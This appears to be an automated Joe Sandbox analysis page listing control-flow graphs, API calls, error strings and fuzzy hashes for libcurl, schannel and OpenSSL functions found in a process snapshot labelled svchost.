                                                                                                                                                                                control_flow_graph 707 7ff8b83679f0-7ff8b8367a4a call 7ff8b83b3b60 call 7ff8b8368230 711 7ff8b8367a4f-7ff8b8367a53 707->711 712 7ff8b8367a55-7ff8b8367a75 call 7ff8b836c990 711->712 713 7ff8b8367ac6-7ff8b8367acd 711->713 720 7ff8b8367b2e-7ff8b8367b35 712->720 721 7ff8b8367a7b-7ff8b8367ac1 _errno * 3 call 7ff8b83aec40 call 7ff8b8374a70 712->721 714 7ff8b8367acf-7ff8b8367ae1 call 7ff8b8368110 713->714 715 7ff8b8367ae8-7ff8b8367b2d call 7ff8b8374bb0 call 7ff8b83c9e10 713->715 714->715 724 7ff8b8367b65 720->724 725 7ff8b8367b37-7ff8b8367b63 setsockopt 720->725 721->713 728 7ff8b8367b6c-7ff8b8367b89 call 7ff8b8374b60 724->728 725->728 735 7ff8b8367b8b-7ff8b8367b8e 728->735 736 7ff8b8367b90-7ff8b8367b95 728->736 735->736 737 7ff8b8367bfb 735->737 736->737 738 7ff8b8367b97-7ff8b8367ba0 736->738 739 7ff8b8367bfe-7ff8b8367c21 737->739 738->739 740 7ff8b8367ba2-7ff8b8367bcd setsockopt 738->740 741 7ff8b8367c5c-7ff8b8367c5f 739->741 742 7ff8b8367c23-7ff8b8367c42 call 7ff8b83bc700 739->742 740->739 743 7ff8b8367bcf-7ff8b8367bf9 WSAGetLastError call 7ff8b83aec40 call 7ff8b8374b60 740->743 745 7ff8b8367c61-7ff8b8367c86 getsockopt 741->745 746 7ff8b8367cb3-7ff8b8367cb6 741->746 754 7ff8b8367c44-7ff8b8367c4e 742->754 755 7ff8b8367c50-7ff8b8367c5a 742->755 743->739 749 7ff8b8367c88-7ff8b8367c90 745->749 750 7ff8b8367c92-7ff8b8367cad setsockopt 745->750 751 7ff8b8367cbc-7ff8b8367cc3 746->751 752 7ff8b8367df8-7ff8b8367e00 746->752 749->746 749->750 750->746 751->752 756 7ff8b8367cc9-7ff8b8367cf7 setsockopt 751->756 758 7ff8b8367e43 752->758 759 7ff8b8367e02-7ff8b8367e2e call 7ff8b8398350 * 2 752->759 754->746 755->745 761 7ff8b8367cf9-7ff8b8367d06 WSAGetLastError 756->761 762 7ff8b8367d0b-7ff8b8367d3d call 7ff8b83bc970 setsockopt 756->762 760 7ff8b8367e46-7ff8b8367e4d 758->760 792 7ff8b8367e35-7ff8b8367e37 759->792 793 7ff8b8367e30-7ff8b8367e33 759->793 766 7ff8b8367e4f-7ff8b8367e52 760->766 767 7ff8b8367e54-7ff8b8367e78 call 7ff8b838ec50 call 7ff8b8367410 760->767 768 7ff8b8367dea-7ff8b8367df3 call 7ff8b8374b60 761->768 774 7ff8b8367d3f-7ff8b8367d55 WSAGetLastError call 7ff8b8374b60 762->774 775 7ff8b8367d5a-7ff8b8367d8c call 7ff8b83bc970 setsockopt 762->775 766->767 770 7ff8b8367e8d-7ff8b8367e9c call 7ff8b839c2d0 766->770 767->770 789 7ff8b8367e7a-7ff8b8367e7d 767->789 768->752 786 7ff8b8367e9e-7ff8b8367eb0 WSAGetLastError 770->786 787 7ff8b8367eb5-7ff8b8367ec6 770->787 774->775 790 7ff8b8367d8e-7ff8b8367da4 WSAGetLastError call 7ff8b8374b60 775->790 791 7ff8b8367da9-7ff8b8367ddb call 7ff8b83bc970 setsockopt 775->791 786->713 787->713 794 7ff8b8367ecc-7ff8b8367ecf 787->794 789->713 795 7ff8b8367e83-7ff8b8367e88 789->795 790->791 791->752 802 7ff8b8367ddd-7ff8b8367de3 WSAGetLastError 791->802 792->758 797 7ff8b8367e39-7ff8b8367e3e 792->797 793->760 794->715 799 7ff8b8367ed5-7ff8b8367efa call 7ff8b8367f90 call 7ff8b83b3b60 794->799 795->713 797->713 799->715 802->768
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3270133340.00007FF8B8361000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B8360000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3270115410.00007FF8B8360000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270172050.00007FF8B83CB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270194651.00007FF8B83E7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270212811.00007FF8B83E8000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270230413.00007FF8B83E9000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270248168.00007FF8B83EB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_7ff8b8360000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ErrorLast$setsockopt$_errno$CountCounterPerformanceQueryTickgetsocknamegetsockopthtonsinet_ntop
                                                                                                                                                                                • String ID: Trying %s:%d...$ Trying [%s]:%d...$ @$Could not set TCP_NODELAY: %s$Failed to set SO_KEEPALIVE on fd %qd: errno %d$Failed to set TCP_KEEPCNT on fd %qd: errno %d$Failed to set TCP_KEEPIDLE on fd %qd: errno %d$Failed to set TCP_KEEPINTVL on fd %qd: errno %d$cf_socket_open() -> %d, fd=%qd$sa_addr inet_ntop() failed with errno %d: %s
                                                                                                                                                                                • API String ID: 1107047317-1591695899
                                                                                                                                                                                • Opcode ID: b6c02dd594823ef74d87e71a3c12994fd1b14fd351ead4f99feb97a9cedbd2c2
                                                                                                                                                                                • Instruction ID: af2399fa366b9de6caa6ff842124400e0e4101b620959bffd8f7c51395acfe0f
                                                                                                                                                                                • Opcode Fuzzy Hash: b6c02dd594823ef74d87e71a3c12994fd1b14fd351ead4f99feb97a9cedbd2c2
                                                                                                                                                                                • Instruction Fuzzy Hash: 3FD16A71A0C64286EB20DB2DE4547BA7760EB49BC4F884231EB4D47799DF3DE54ACB08

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 1008 7ff8b83bf4f0-7ff8b83bf54e 1009 7ff8b83bf550-7ff8b83bf554 1008->1009 1010 7ff8b83bf56a-7ff8b83bf56f 1008->1010 1009->1010 1011 7ff8b83bf556-7ff8b83bf565 call 7ff8b8374b60 1009->1011 1012 7ff8b83bf581-7ff8b83bf585 1010->1012 1013 7ff8b83bf571-7ff8b83bf57c 1010->1013 1026 7ff8b83bf8b1-7ff8b83bf8b6 1011->1026 1016 7ff8b83bf593-7ff8b83bf596 1012->1016 1017 7ff8b83bf587-7ff8b83bf58e 1012->1017 1015 7ff8b83bf8a0 1013->1015 1018 7ff8b83bf8a3 call 7ff8b8374b60 1015->1018 1020 7ff8b83bf680-7ff8b83bf687 1016->1020 1021 7ff8b83bf59c-7ff8b83bf5a0 1016->1021 1017->1015 1024 7ff8b83bf8a8-7ff8b83bf8ab 1018->1024 1020->1024 1025 7ff8b83bf68d-7ff8b83bf68f 1020->1025 1021->1020 1022 7ff8b83bf5a6-7ff8b83bf5bb 1021->1022 1027 7ff8b83bf5c2-7ff8b83bf5e0 realloc 1022->1027 1028 7ff8b83bf5bd-7ff8b83bf5c0 1022->1028 1024->1026 1029 7ff8b83bf9a8-7ff8b83bf9ae 1024->1029 1025->1024 1031 7ff8b83bf695-7ff8b83bf698 1025->1031 1026->1029 1030 7ff8b83bf8bc-7ff8b83bf8c0 1026->1030 1033 7ff8b83bf5e2-7ff8b83bf5f9 call 7ff8b8374a70 1027->1033 1034 7ff8b83bf5fe-7ff8b83bf609 1027->1034 1028->1027 1032 7ff8b83bf60d-7ff8b83bf634 call 7ff8b8368c40 1028->1032 1038 7ff8b83bf9b0-7ff8b83bf9b3 1029->1038 1039 7ff8b83bf9b8-7ff8b83bf9c6 1029->1039 1030->1029 1035 7ff8b83bf8c6-7ff8b83bf8ca 1030->1035 1036 7ff8b83bf6aa-7ff8b83bf720 call 7ff8b83bc9b0 1031->1036 1037 7ff8b83bf69a-7ff8b83bf69e 1031->1037 1059 7ff8b83bf661-7ff8b83bf664 1032->1059 1060 7ff8b83bf636-7ff8b83bf63a 1032->1060 1033->1026 1034->1032 1035->1029 1044 7ff8b83bf8d0-7ff8b83bf8ef call 7ff8b83bc700 1035->1044 1070 7ff8b83bf722-7ff8b83bf727 1036->1070 1071 7ff8b83bf734-7ff8b83bf739 1036->1071 1037->1036 1045 7ff8b83bf6a0-7ff8b83bf6a4 1037->1045 1038->1039 1047 7ff8b83bf9b5 1038->1047 1040 7ff8b83bf9c8-7ff8b83bf9fc memmove * 2 1039->1040 1041 7ff8b83bf9fe-7ff8b83bfa04 1039->1041 1048 7ff8b83bfa28-7ff8b83bfa4a call 7ff8b83c9e10 1040->1048 1049 7ff8b83bfa06-7ff8b83bfa09 1041->1049 1050 7ff8b83bfa18-7ff8b83bfa1b 1041->1050 1068 7ff8b83bf991-7ff8b83bf9a3 call 7ff8b8374b60 1044->1068 1069 7ff8b83bf8f5-7ff8b83bf8f7 1044->1069 1045->1024 1045->1036 1047->1039 1049->1050 1055 7ff8b83bfa0b-7ff8b83bfa13 1049->1055 1056 7ff8b83bfa23-7ff8b83bfa25 1050->1056 1057 7ff8b83bfa1d-7ff8b83bfa21 1050->1057 1055->1050 1056->1048 1057->1056 1063 7ff8b83bf666-7ff8b83bf66a 1059->1063 1064 7ff8b83bf66c 1059->1064 1066 7ff8b83bf676-7ff8b83bf678 1060->1066 1067 7ff8b83bf63c-7ff8b83bf643 1060->1067 1063->1066 1064->1066 1072 7ff8b83bf66e-7ff8b83bf672 1064->1072 1066->1020 1073 7ff8b83bf653-7ff8b83bf65f call 7ff8b8374b60 1067->1073 1074 7ff8b83bf645-7ff8b83bf651 call 7ff8b8374b60 1067->1074 1068->1029 1069->1068 1076 7ff8b83bf8fd-7ff8b83bf901 1069->1076 1070->1071 1078 7ff8b83bf729-7ff8b83bf72e 1070->1078 1079 7ff8b83bf7b2-7ff8b83bf7b6 1071->1079 1080 7ff8b83bf73b-7ff8b83bf75d 1071->1080 1072->1066 1073->1066 1074->1066 1076->1029 1078->1071 1083 7ff8b83bf906-7ff8b83bf90c 1078->1083 1086 7ff8b83bf7e6 1079->1086 1087 7ff8b83bf7b8-7ff8b83bf7bd 1079->1087 1084 7ff8b83bf764-7ff8b83bf77f realloc 1080->1084 1085 7ff8b83bf75f-7ff8b83bf762 1080->1085 1094 7ff8b83bf90e-7ff8b83bf917 1083->1094 1095 7ff8b83bf92d-7ff8b83bf958 call 7ff8b83ae4c0 call 7ff8b8374b60 1083->1095 1091 7ff8b83bf785-7ff8b83bf78d 1084->1091 1092 7ff8b83bf95d-7ff8b83bf974 call 7ff8b8374a70 1084->1092 1085->1084 1090 7ff8b83bf791-7ff8b83bf795 1085->1090 1089 7ff8b83bf7ea-7ff8b83bf7f0 1086->1089 1087->1086 1093 7ff8b83bf7bf-7ff8b83bf7c9 1087->1093 1096 7ff8b83bf7f6-7ff8b83bf80b call 7ff8b8374b60 1089->1096 1097 7ff8b83bf87f-7ff8b83bf885 1089->1097 1100 7ff8b83bf7b0 1090->1100 1101 7ff8b83bf797-7ff8b83bf7ac memmove 1090->1101 1091->1090 1092->1024 1093->1089 1102 7ff8b83bf7cb-7ff8b83bf7e4 memmove 1093->1102 1103 7ff8b83bf921-7ff8b83bf928 1094->1103 1104 7ff8b83bf919 1094->1104 1095->1024 1113 7ff8b83bf816-7ff8b83bf866 call 7ff8b8374b60 call 7ff8b83c1420 1096->1113 1114 7ff8b83bf80d-7ff8b83bf810 1096->1114 1097->1020 1108 7ff8b83bf88b-7ff8b83bf893 1097->1108 1100->1079 1101->1100 1102->1089 1103->1015 1104->1103 1111 7ff8b83bf895 1108->1111 1112 7ff8b83bf899 1108->1112 1111->1112 1112->1015 1121 7ff8b83bf985-7ff8b83bf98c 1113->1121 1122 7ff8b83bf86c-7ff8b83bf87a call 7ff8b8374b60 1113->1122 1114->1113 1116 7ff8b83bf979-7ff8b83bf980 1114->1116 1116->1015 1121->1018 1122->1020
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3270133340.00007FF8B8361000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B8360000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3270115410.00007FF8B8360000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270172050.00007FF8B83CB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270194651.00007FF8B83E7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270212811.00007FF8B83E8000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270230413.00007FF8B83E9000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270248168.00007FF8B83EB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_7ff8b8360000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: memmove
                                                                                                                                                                                • String ID: schannel: SSL/TLS connection renegotiated$schannel: an unrecoverable error occurred in a prior call$schannel: cannot renegotiate, an error is pending$schannel: enough decrypted data is already available$schannel: failed to decrypt data, need more data$schannel: failed to read data from server: %s$schannel: recv returned CURLE_RECV_ERROR$schannel: recv returned error %d$schannel: remote party requests renegotiation$schannel: renegotiating SSL/TLS connection$schannel: renegotiation failed$schannel: server close notification received (close_notify)$schannel: server closed abruptly (missing close_notify)$schannel: server indicated shutdown in a prior call$schannel: unable to re-allocate memory
                                                                                                                                                                                • API String ID: 2162964266-1798541782
                                                                                                                                                                                • Opcode ID: 5fe04b545611d9c30b49c2f9328d5b2dc32e23f0cc5aed2d3d03f2e6b3587ede
                                                                                                                                                                                • Instruction ID: 23b5ad0de0505a64fcbf6c1545477228fdde765aac227958410c324979edf1e6
                                                                                                                                                                                • Opcode Fuzzy Hash: 5fe04b545611d9c30b49c2f9328d5b2dc32e23f0cc5aed2d3d03f2e6b3587ede
                                                                                                                                                                                • Instruction Fuzzy Hash: 41E17EB2A08B4289EB60DF2DD45476937A1FB48BC8F486136DB4C47698DF7DE842C748

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 1125 7ff8a9347970-7ff8a9347980 call 7ff8a935edf0 1128 7ff8a9347982-7ff8a9347986 1125->1128 1129 7ff8a93479a4-7ff8a93479ad 1125->1129 1130 7ff8a9347988-7ff8a934798b 1128->1130 1131 7ff8a9347996-7ff8a93482f7 call 7ff8a935edf0 1128->1131 1130->1129 1132 7ff8a934798d-7ff8a9347994 1130->1132 1136 7ff8a93482fd-7ff8a9348314 ERR_clear_error SetLastError 1131->1136 1137 7ff8a934855f-7ff8a9348579 1131->1137 1132->1129 1132->1131 1138 7ff8a9348316-7ff8a934831a 1136->1138 1139 7ff8a9348321-7ff8a934832b 1136->1139 1138->1139 1140 7ff8a934832d-7ff8a9348334 1139->1140 1141 7ff8a9348336-7ff8a9348339 1139->1141 1142 7ff8a9348348-7ff8a934834f 1140->1142 1143 7ff8a9348379-7ff8a9348383 1141->1143 1144 7ff8a934833b-7ff8a9348346 1141->1144 1142->1143 1147 7ff8a9348351-7ff8a9348353 1142->1147 1145 7ff8a9348395-7ff8a934839d 1143->1145 1146 7ff8a9348385-7ff8a934838f call 7ff8a92e5e50 1143->1146 1144->1142 1144->1143 1149 7ff8a934839f-7ff8a93483a2 1145->1149 1150 7ff8a93483a9 1145->1150 1146->1137 1146->1145 1151 7ff8a934835a-7ff8a934835d 1147->1151 1152 7ff8a9348355-7ff8a9348358 1147->1152 1156 7ff8a93483a4 1149->1156 1157 7ff8a93483b0-7ff8a93483b7 1149->1157 1150->1157 1151->1145 1154 7ff8a934835f-7ff8a9348365 1151->1154 1153 7ff8a9348367-7ff8a934836e 1152->1153 1153->1145 1158 7ff8a9348370-7ff8a9348377 1153->1158 1154->1145 1154->1153 1159 7ff8a93485ed-7ff8a93485f0 1156->1159 1160 7ff8a93483b9-7ff8a93483c0 1157->1160 1161 7ff8a93483fa-7ff8a9348410 1157->1161 1158->1143 1158->1145 1162 7ff8a934866e-7ff8a9348679 call 7ff8a9347ed0 1159->1162 1163 7ff8a93485f2-7ff8a93485f5 1159->1163 1166 7ff8a93483ec-7ff8a93483f4 1160->1166 1167 7ff8a93483c2-7ff8a93483c9 1160->1167 1164 7ff8a934845f-7ff8a9348469 1161->1164 1165 7ff8a9348412-7ff8a934841c 1161->1165 1189 7ff8a934867f 1162->1189 1190 7ff8a9348532 1162->1190 1168 7ff8a934868a-7ff8a934868d call 7ff8a9348720 1163->1168 1169 7ff8a93485fb-7ff8a9348602 1163->1169 1171 7ff8a9348477-7ff8a934848d call 7ff8a92dd840 1164->1171 1173 7ff8a934846b-7ff8a9348475 ERR_new 1164->1173 1170 7ff8a934841e-7ff8a9348421 1165->1170 1165->1171 1166->1161 1167->1166 1174 7ff8a93483cb-7ff8a93483da 1167->1174 1191 7ff8a9348692-7ff8a9348695 1168->1191 1176 7ff8a9348609-7ff8a9348636 ERR_new ERR_set_debug call 7ff8a9347c10 1169->1176 1177 7ff8a9348604-7ff8a9348607 1169->1177 1178 7ff8a934842a-7ff8a934842f ERR_new 1170->1178 1179 7ff8a9348423-7ff8a9348428 1170->1179 1194 7ff8a934848f-7ff8a9348499 ERR_new 1171->1194 1195 7ff8a934849b-7ff8a93484a2 1171->1195 1182 7ff8a9348434-7ff8a934845a ERR_set_debug call 7ff8a9347c10 1173->1182 1174->1166 1175 7ff8a93483dc-7ff8a93483e3 1174->1175 1175->1166 1185 7ff8a93483e5-7ff8a93483ea 1175->1185 1186 7ff8a934863b-7ff8a9348669 ERR_new ERR_set_debug ERR_set_error 1176->1186 1177->1176 1177->1186 1178->1182 1179->1171 1179->1178 1197 7ff8a9348535-7ff8a9348546 BUF_MEM_free 1182->1197 1185->1161 1185->1166 1186->1190 1189->1168 1190->1197 1192 7ff8a93486aa-7ff8a93486b0 1191->1192 1193 7ff8a9348697-7ff8a93486a8 1191->1193 1192->1197 1198 7ff8a93486b6-7ff8a93486c3 1192->1198 1193->1162 1194->1182 1199 7ff8a93484e8-7ff8a9348500 call 7ff8a92ef340 1195->1199 1200 7ff8a93484a4-7ff8a93484af BUF_MEM_new 1195->1200 1197->1137 1201 7ff8a9348548-7ff8a9348556 1197->1201 1198->1197 1210 7ff8a934857a-7ff8a934857e 1199->1210 1211 7ff8a9348502-7ff8a934852d ERR_new ERR_set_debug call 7ff8a9347c10 1199->1211 1204 7ff8a93484c0-7ff8a93484d0 BUF_MEM_grow 1200->1204 1205 7ff8a93484b1-7ff8a93484bb ERR_new 1200->1205 1202 7ff8a934855d 1201->1202 1203 7ff8a9348558 1201->1203 1202->1137 1203->1202 1207 7ff8a93484e1 1204->1207 1208 7ff8a93484d2-7ff8a93484dc ERR_new 1204->1208 1205->1182 1207->1199 1208->1182 1212 7ff8a9348585-7ff8a9348588 1210->1212 1213 7ff8a9348580-7ff8a9348583 1210->1213 1211->1190 1216 7ff8a934858a-7ff8a9348591 1212->1216 1217 7ff8a93485a5-7ff8a93485ac 1212->1217 1215 7ff8a9348593-7ff8a934859a 1213->1215 1215->1217 1218 7ff8a934859c-7ff8a93485a3 1215->1218 1216->1215 1216->1217 1219 7ff8a93485dd-7ff8a93485e8 1217->1219 1220 7ff8a93485ae-7ff8a93485bb call 7ff8a9356610 1217->1220 1218->1217 1218->1220 1219->1159 1220->1197 1223 7ff8a93485c1-7ff8a93485c8 1220->1223 1224 7ff8a93485ca-7ff8a93485d1 1223->1224 1225 7ff8a93485d3 1223->1225 1224->1219 1224->1225 1225->1219
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3270001047.00007FF8A92D1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8A92D0000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3269982680.00007FF8A92D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270048579.00007FF8A9360000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270075892.00007FF8A938D000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270095241.00007FF8A9391000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_7ff8a92d0000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: R_newR_set_debug$ErrorLastM_freeR_clear_errorR_set_error
                                                                                                                                                                                • String ID: ssl\statem\statem.c$state_machine
                                                                                                                                                                                • API String ID: 2605663294-1334640251
                                                                                                                                                                                • Opcode ID: 48b027c2e20d56dac79a9c5c64ffc6497de1d13581ba5d05f39c203f3311fe2a
                                                                                                                                                                                • Instruction ID: 9664421d76609c90a248e8efbd041462e07426ef9f64bb631d555fe9b6a0a218
                                                                                                                                                                                • Opcode Fuzzy Hash: 48b027c2e20d56dac79a9c5c64ffc6497de1d13581ba5d05f39c203f3311fe2a
                                                                                                                                                                                • Instruction Fuzzy Hash: 29C1AE31A0FAC2A5FB649F25C4513B922B0EF84BC5F096435CE2DCA685DFBCE8418651

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 1226 7ff8b83c1a60-7ff8b83c1abb call 7ff8b83c4a40 1229 7ff8b83c1ac1-7ff8b83c1ac6 1226->1229 1230 7ff8b83c209d 1226->1230 1229->1230 1231 7ff8b83c1acc-7ff8b83c1ae1 1229->1231 1232 7ff8b83c1ae3-7ff8b83c1b05 malloc 1231->1232 1233 7ff8b83c1b0b-7ff8b83c1b12 1231->1233 1232->1233 1234 7ff8b83c2091 1232->1234 1235 7ff8b83c1b14-7ff8b83c1b38 malloc 1233->1235 1236 7ff8b83c1b3e-7ff8b83c1b4f 1233->1236 1234->1230 1235->1234 1235->1236 1237 7ff8b83c1bb2-7ff8b83c1bb4 1236->1237 1238 7ff8b83c1b51-7ff8b83c1b64 realloc 1236->1238 1239 7ff8b83c1c01-7ff8b83c1c98 call 7ff8b83bc9b0 malloc 1237->1239 1240 7ff8b83c1bb6-7ff8b83c1be3 call 7ff8b8368c40 1237->1240 1241 7ff8b83c1b66-7ff8b83c1ba9 call 7ff8b8374a70 call 7ff8b83c9e10 1238->1241 1242 7ff8b83c1baa-7ff8b83c1bae 1238->1242 1239->1234 1252 7ff8b83c1c9e-7ff8b83c1cf8 memmove 1239->1252 1250 7ff8b83c2081 1240->1250 1251 7ff8b83c1be9-7ff8b83c1beb 1240->1251 1242->1237 1256 7ff8b83c208a 1250->1256 1254 7ff8b83c1de2-7ff8b83c1df1 call 7ff8b8374a70 1251->1254 1255 7ff8b83c1bf1-7ff8b83c1bf4 1251->1255 1259 7ff8b83c1cff-7ff8b83c1d19 free 1252->1259 1269 7ff8b83c1dfb-7ff8b83c1e1b call 7ff8b8374a70 1254->1269 1255->1254 1258 7ff8b83c1bfa-7ff8b83c1bfe 1255->1258 1256->1234 1258->1239 1260 7ff8b83c1d1f-7ff8b83c1d26 1259->1260 1261 7ff8b83c207d 1259->1261 1263 7ff8b83c1fd2-7ff8b83c1fd7 1260->1263 1264 7ff8b83c1d2c-7ff8b83c1d33 1260->1264 1261->1250 1265 7ff8b83c2066-7ff8b83c206f 1263->1265 1266 7ff8b83c1fdd-7ff8b83c1fed call 7ff8b83ae4c0 1263->1266 1267 7ff8b83c1d35-7ff8b83c1d38 1264->1267 1268 7ff8b83c1d3e-7ff8b83c1d40 1264->1268 1265->1261 1273 7ff8b83c1ff2-7ff8b83c1fff 1266->1273 1267->1266 1267->1268 1271 7ff8b83c1d47-7ff8b83c1d4b 1268->1271 1286 7ff8b83c1e25 1269->1286 1274 7ff8b83c1d83-7ff8b83c1d8a 1271->1274 1275 7ff8b83c1d4d-7ff8b83c1d51 1271->1275 1277 7ff8b83c2001-7ff8b83c2008 1273->1277 1278 7ff8b83c2055-7ff8b83c2061 call 7ff8b8374a70 1273->1278 1280 7ff8b83c1d99-7ff8b83c1da2 1274->1280 1281 7ff8b83c1d8c 1274->1281 1275->1274 1279 7ff8b83c1d53-7ff8b83c1d7a call 7ff8b8368c60 1275->1279 1283 7ff8b83c200a-7ff8b83c2011 1277->1283 1284 7ff8b83c203f-7ff8b83c204b call 7ff8b8374a70 1277->1284 1278->1265 1279->1269 1298 7ff8b83c1d7c-7ff8b83c1d81 1279->1298 1280->1271 1287 7ff8b83c1da4-7ff8b83c1da8 1280->1287 1281->1280 1289 7ff8b83c2013-7ff8b83c201f call 7ff8b8374a70 1283->1289 1290 7ff8b83c2029-7ff8b83c2035 call 7ff8b8374a70 1283->1290 1284->1278 1292 7ff8b83c1e2d-7ff8b83c1e34 1286->1292 1287->1286 1294 7ff8b83c1daa-7ff8b83c1daf 1287->1294 1289->1290 1290->1284 1292->1250 1300 7ff8b83c1e3a-7ff8b83c1e3d 1292->1300 1294->1286 1296 7ff8b83c1db1-7ff8b83c1dbb 1294->1296 1296->1292 1301 7ff8b83c1dbd-7ff8b83c1dda memmove 1296->1301 1298->1269 1298->1274 1304 7ff8b83c1e48-7ff8b83c1e52 call 7ff8b83c4a60 1300->1304 1305 7ff8b83c1e3f 1300->1305 1301->1239 1307 7ff8b83c1de0 1301->1307 1309 7ff8b83c1e54-7ff8b83c1e5b 1304->1309 1310 7ff8b83c1e5d 1304->1310 1305->1304 1307->1300 1311 7ff8b83c1e64-7ff8b83c1e67 1309->1311 1310->1311 1312 7ff8b83c1f94-7ff8b83c1f9c 1311->1312 1313 7ff8b83c1e6d-7ff8b83c1e9d 1311->1313 1314 7ff8b83c1fb8-7ff8b83c1fbc 1312->1314 1315 7ff8b83c1f9e-7ff8b83c1fa2 1312->1315 1320 7ff8b83c1ea3-7ff8b83c1eab 1313->1320 1321 7ff8b83c1f3e-7ff8b83c1f5f call 7ff8b83ae4c0 call 7ff8b8374a70 1313->1321 1314->1256 1318 7ff8b83c1fc2-7ff8b83c1fcd call 7ff8b83c28a0 1314->1318 1315->1256 1316 7ff8b83c1fa8-7ff8b83c1fb3 call 7ff8b83c2470 1315->1316 1316->1314 1318->1263 1320->1321 1324 7ff8b83c1eb1-7ff8b83c1eb4 1320->1324 1336 7ff8b83c1f64 1321->1336 1327 7ff8b83c1eba-7ff8b83c1ec1 1324->1327 1328 7ff8b83c1f69-7ff8b83c1f6c 1324->1328 1327->1328 1330 7ff8b83c1ec7-7ff8b83c1eee memset call 7ff8b83c7ff0 1327->1330 1332 7ff8b83c1f74-7ff8b83c1f7a 1328->1332 1333 7ff8b83c1f6e CertFreeCertificateContext 1328->1333 1330->1336 1340 7ff8b83c1ef0-7ff8b83c1efa 1330->1340 1332->1312 1334 7ff8b83c1f7c-7ff8b83c1f8b call 7ff8b8374a70 1332->1334 1333->1332 1334->1312 1336->1328 1341 7ff8b83c1f2d-7ff8b83c1f3c call 7ff8b8374a70 1340->1341 1342 7ff8b83c1efc-7ff8b83c1f06 1340->1342 1341->1336 1342->1341 1343 7ff8b83c1f08-7ff8b83c1f1a call 7ff8b83c4560 1342->1343 1343->1336 1348 7ff8b83c1f1c-7ff8b83c1f2b call 7ff8b8374a70 1343->1348 1348->1336
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3270133340.00007FF8B8361000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B8360000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3270115410.00007FF8B8360000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270172050.00007FF8B83CB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270194651.00007FF8B83E7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270212811.00007FF8B83E8000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270230413.00007FF8B83E9000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270248168.00007FF8B83EB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_7ff8b8360000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Certmalloc$CertificateContextFreefreememmove$ErrorLastNameString_errnomemsetrealloc
